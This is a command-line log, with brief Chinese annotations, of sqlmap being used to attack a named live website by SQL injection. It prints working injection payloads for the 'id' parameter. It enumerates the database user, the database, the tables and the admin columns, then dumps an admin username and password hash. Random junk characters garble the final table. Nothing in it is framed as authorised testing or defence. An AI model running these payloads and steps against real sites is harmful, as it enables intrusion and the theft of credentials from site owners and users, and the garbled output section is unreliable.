D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-user /* 注解:获取当前用户名称
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk'
shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-db /*当前数据库
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk'
shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk'
shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
ssion': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack o
n retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
; X6 v+ |3 ~+ ^1 h$ R| password | userid |
2 Y; s. q' _- A! u1 X$ I% R+----------------------------------+------------+" j' X0 _1 i: `; \9 ^- z1 l$ H O
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |- Z5 |3 W5 `2 `
+----------------------------------+------------+9 d& @( q' o# U2 w6 Z
shutting down at: 16:58:14

D:\Python27\sqlmap> |